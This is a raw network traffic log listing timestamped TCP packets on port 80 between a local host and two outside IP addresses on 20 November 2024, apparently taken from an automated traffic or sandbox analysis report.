                                                                                                                              Nov 20, 2024 10:57:06.283397913 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283895016 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283930063 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283943892 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283963919 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283984900 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283998966 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.284015894 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.284046888 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.284239054 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.284276962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.284312010 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.284323931 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.284323931 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.284382105 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.285162926 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.285200119 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.285212040 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.285234928 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.285269976 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.285280943 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.285280943 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.285310030 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.286019087 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.286078930 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.317045927 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.317069054 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.317090034 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.317116022 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.317394972 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.317743063 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.317780018 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.317815065 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.317828894 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.317828894 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.317874908 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.318734884 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.318775892 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.318804979 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.318809986 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.318828106 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.318844080 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.318888903 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.318888903 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.319200993 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.319236040 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.319271088 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.319279909 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.319279909 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.319334984 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.320055962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.320091009 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.320116997 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.320125103 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.320144892 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.320161104 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.320163965 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.320240021 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.320827007 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.320863962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.320883036 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.320899010 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.320949078 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.320949078 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.321824074 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.321858883 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.321887016 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.321892977 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.321924925 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.321980953 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.322643042 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.322679043 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.322702885 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.322711945 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.322747946 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.322748899 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.322793007 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.322793007 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.324402094 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.324439049 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.324454069 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.324475050 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.324489117 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.324579000 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.325304031 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.325339079 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.325376034 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.325385094 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.325385094 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.325437069 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.326149940 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.326188087 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.326210976 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.326221943 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.326242924 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.326258898 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.326303959 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.326303959 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.327414989 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.327470064 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.327570915 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.327606916 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.327650070 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.327650070 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.327910900 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.327946901 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.327966928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.328039885 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.328085899 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.328140020 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.328854084 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.328890085 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.328922987 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.328934908 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.328934908 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.328959942 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.329005003 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.329005003 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.329734087 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.329768896 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.329802036 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.329802990 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.329822063 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.329859972 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.329952002 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.329988003 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.330022097 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.330032110 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.330032110 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.330112934 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.332458019 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.332515955 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.332576990 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.332611084 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.332633972 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.332648993 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.332695007 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.332695007 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.333139896 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.333175898 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.333195925 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.333209991 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.333235979 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.333261013 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.333676100 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.333713055 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.333745956 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.333746910 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.333759069 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.333796978 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.335117102 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.335170031 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.335171938 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.335206985 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.335252047 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.335252047 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.336056948 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.336091995 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.336127996 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.336137056 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.336137056 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.336164951 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.336210012 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.336210012 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.337452888 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.337488890 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.337527037 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.337539911 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.337539911 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.337563038 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.337579966 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.337618113 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.339481115 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.339515924 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.339546919 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.339550018 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.339559078 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.339589119 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.367244959 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.367281914 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.367341042 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.367522001 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.367522001 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.367522001 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.367924929 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.367959976 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.367980003 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.367995977 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.368019104 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.368400097 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.369271994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.369308949 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.369326115 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.369338036 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.369373083 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.369381905 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.369381905 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.369462967 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.371113062 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.371150970 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.371167898 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.371184111 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.371195078 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.371218920 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.371259928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.371259928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:10.583731890 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:10.583834887 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:12.788789988 CET4973480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:12.797506094 CET804973494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:12.797580004 CET4973480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:12.800262928 CET4973480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:12.807945013 CET804973494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:12.808001995 CET4973480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:12.815865040 CET804973494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:13.563699007 CET804973494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:13.563730955 CET804973494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:13.563783884 CET4973480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:13.563905954 CET4973480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:13.572747946 CET804973494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:13.742082119 CET4973580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:13.749701977 CET804973594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:13.749802113 CET4973580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:13.752315998 CET4973580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:13.757282972 CET804973594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:13.757343054 CET4973580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:13.762371063 CET804973594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:14.904177904 CET804973594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:14.904339075 CET4973580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:14.904376984 CET804973594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:14.904429913 CET4973580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:14.935204983 CET804973594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:14.935308933 CET4973580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:14.944233894 CET804973594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:14.975883007 CET4973780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:14.998311043 CET804973794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:14.998421907 CET4973780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:15.000155926 CET4973780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:15.026823044 CET804973794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:15.026901007 CET4973780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:15.043924093 CET804973794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:15.745897055 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:15.973125935 CET804973794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:15.973268986 CET4973780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:15.974914074 CET804973794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:15.974982023 CET4973780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:15.987855911 CET804973794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:16.113919973 CET4973980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:16.119182110 CET804973994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:16.119294882 CET4973980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:16.121282101 CET4973980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:16.127567053 CET804973994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:16.128443003 CET4973980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:16.136828899 CET804973994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:16.996128082 CET804973994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:16.996278048 CET4973980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:16.998735905 CET804973994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:16.998792887 CET4973980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:17.006051064 CET804973994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:17.151772022 CET4974080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:17.159086943 CET804974094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:17.159162998 CET4974080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:17.161698103 CET4974080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:17.172113895 CET804974094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:17.172162056 CET4974080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:17.179037094 CET804974094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:17.928177118 CET804974094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:17.928225040 CET804974094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:17.928297043 CET4974080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:17.928333998 CET4974080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:17.936079979 CET804974094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:18.081243038 CET4974280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:18.086416960 CET804974294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:18.086496115 CET4974280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:18.088597059 CET4974280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:18.095000029 CET804974294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:18.095134974 CET4974280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:18.103194952 CET804974294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:18.827666044 CET804974294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:18.827776909 CET4974280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:18.827908039 CET804974294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:18.827961922 CET4974280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:18.832714081 CET804974294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:19.043694019 CET4974680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:19.048960924 CET804974694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:19.051810026 CET4974680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:19.180116892 CET4974680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:19.185269117 CET804974694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:19.188468933 CET4974680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:19.193450928 CET804974694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:19.860785007 CET804974694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:19.860801935 CET804974694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:19.860877037 CET4974680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:19.860929966 CET4974680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:19.868968964 CET804974694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:20.002995968 CET4974880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:20.008618116 CET804974894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:20.008701086 CET4974880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:20.010689020 CET4974880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:20.015677929 CET804974894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:20.015773058 CET4974880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:20.020867109 CET804974894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:20.941595078 CET804974894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:20.941870928 CET4974880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:20.944310904 CET804974894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:20.944375038 CET4974880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:20.949029922 CET804974894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:21.085119009 CET4975080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:21.091339111 CET804975094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:21.091418982 CET4975080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:21.093544006 CET4975080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:21.098722935 CET804975094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:21.098850965 CET4975080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:21.103754997 CET804975094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:21.966209888 CET804975094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:21.966320992 CET4975080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:21.966411114 CET804975094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:21.966486931 CET4975080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:21.975270033 CET804975094.156.177.41192.168.2.4
